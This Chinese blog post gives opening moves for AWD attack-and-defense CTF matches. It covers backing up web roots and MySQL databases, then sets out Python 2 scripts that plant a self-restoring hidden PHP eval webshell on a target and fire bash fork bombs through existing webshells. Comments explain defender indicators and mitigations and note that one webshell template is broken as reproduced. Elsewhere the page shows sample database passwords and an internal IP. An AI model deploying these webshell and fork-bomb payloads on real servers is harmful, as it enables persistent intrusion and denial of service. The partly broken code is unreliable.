0x00 refer

https://www.jagger2zr.com/2019/08/30/AWD%E8%B5%B7%E6%89%8B%E5%BC%8F%E5%8F%8A%E6%AF%94%E8%B5%9B%E6%80%BB%E7%BB%93/

0x01 起手

源码

压缩命令:tar -zcvf www.tar.gz .

解压命令:tar -xvzf www.tar.gz -C .

也可直接xshell转,一般很快

数据库

cd /var/lib/mysql

mysqldump -u root -p Test>Test0809.sql

mysql -u root -p Test<Test0809.sql,输入密码即可(将要恢复的数据库文件放到服务器的某个目录下,并进入这个目录执行以上命令)

mysqldump -uroot -p --single-transaction --all-databases > backup.sql #所有
mysqldump -u root -p --single-transaction dataname > dataname.sql #单个

#遇到加锁的情况:
mysqldump --skip-lock-tables -uxxxx -p -h 166.111.9.173 -R urlevent20180319 > ./backup.sql

`mysqldump -h127.0.0.1 -uroot -ppassword database |gzip > $backupDir/$database-$today.sql.gz`

授权

GRANT ALL PRIVILEGES ON *.* TO root@localhost IDENTIFIED BY "ysx123456";
flush privileges;

改密码

update mysql.user set password=PASSWORD('123456') where user='root'; (MySQL 5.7.6 起 mysql.user 表已无 password 列,新版本应改用 ALTER USER 'root'@'localhost' IDENTIFIED BY '...';)
flush privileges;

0x02 权限控制

写不死马

  • eval型

    # Python 2 code (print statement, str.encode("base64")).
    # Builds a PHP script that, once started, never returns (ignore_user_abort +
    # set_time_limit(0)) and re-creates the hidden dotfile ".<password>.php" every
    # `sleep_time` microseconds whenever its content differs, then uploads that
    # script through code_exec (defined elsewhere). From a defender's view the
    # artifacts are: a dotfile under `directory` containing base64-wrapped
    # eval() on $_REQUEST, and a PHP worker that stays busy indefinitely --
    # file-integrity monitoring of the web root and killing the long-running
    # worker are what break the loop.
    def write_memery_webshell(url, directory, password): 
        sleep_time = 500 # micro second 
        code = "<?php $content = '<?php eval(base64_decode($_REQUEST[%s]));?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0);      while(true){ if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time)
        filename = ".%s.php" % (password)
        path = "%s/%s" % (directory, filename)
        # base64 sidesteps PHP quoting; Python 2's "base64" codec inserts a
        # newline every 76 chars, hence the replace().
        payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", "")) 
        print payload 
        # code_exec is not shown here; presumably returns newline-separated
        # output, the trailing empty element is dropped -- confirm against caller.
        return code_exec(url, payload).split("\n")[0:-1]
  • 命令型

# Python 2 code; command-execution variant of the function above, differing
# only in the PHP template and in calling shell_exec instead of code_exec.
# NOTE(review): as reproduced on this page the "$content = ..." part of the
# template has been lost (only whitespace remains after "<?php"), leaving three
# format placeholders (%s, %s, %d) for four arguments, so the "%" on the `code`
# line would raise TypeError as written.
def write_memery_webshell(url, directory, password): 
    sleep_time = 500 # micro second 
    code = "<?php                                       ?>'; $writable_path = '%s'; $filename = '.%s.php'; $path = $writable_path.'/'.$filename; ignore_user_abort(true); set_time_limit(0); while(true){      if(file_get_contents($path) != $content){ file_put_contents($path, $content); } usleep(%d); }?>" % (password, directory, password, sleep_time) 
    filename = ".%s.php" % (password) 
    path = "%s/%s" % (directory, filename) 
    # Python 2's "base64" codec wraps lines every 76 chars, hence the replace().
    payload = "file_put_contents('%s', base64_decode('%s'));" % (path, code.encode("base64").replace("\n", "")) 
    # shell_exec is not shown here; presumably returns newline-separated output.
    return shell_exec(url, payload).split("\n")[0:-1]
  • 唤醒内存马
# Python 2 code. Issues a single GET to `url` so the server starts executing
# the uploaded script; because that script loops forever, the request is
# expected to hit the 0.5 s timeout.
# NOTE(review): the bare `except:` treats *any* failure (connection refused,
# DNS error, KeyboardInterrupt) as success and prints "[+] OK!", while a request
# that actually returns within 0.5 s prints nothing -- so the message is not a
# reliable indicator; catching requests.exceptions.Timeout specifically would be.
def active_memery_webshell(url): 
    try: 
        requests.get(url, timeout=0.5) 
    except: 
        print "[+] OK!"

fork炸弹

  • eval型

    # Posts PHP code to http://<ip>:80/code.php in the `pass` parameter. The
    # PHP writes a bash fork-bomb one-liner to /tmp/aaa and runs it with
    # /bin/bash, exhausting the target's process table. From a defender's
    # view the indicators are the file /tmp/aaa and a POST carrying "system("
    # to code.php; per-user process limits (ulimit -u / cgroup pids.max) are
    # what contain the damage. `port` is hard-coded to "80".
    def eval_fork(ip): 
        host = ip
        port = "80" 
        url = "http://%s:%s/code.php" % (host, port) 
        code = "system(\"echo '.() { .|.& } && .' > /tmp/aaa\");system(\"/bin/bash /tmp/aaa\");echo \"seems good!\";" 
        data = {'pass':code}
        # Response is discarded; if the bomb takes effect the request likely
        # never completes -- no timeout is set, so this call may block.
        requests.post(url, data=data)
  • 命令型

    # Sends the classic bash fork bomb ":(){ :|: & };:" to http://<ip>:80/c.php
    # via shell_exec (defined elsewhere). Same effect and same mitigation as
    # eval_fork: process-count limits on the target. `port` is hard-coded to
    # "80"; the return value of shell_exec is discarded.
    def shell_fork(ip): 
        host = ip
        port = "80" 
        url = "http://%s:%s/c.php" % (host, port) 
        command = ":(){ :|: & };:" 
        shell_exec(url, command)

0x03 流量

脏流量


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!
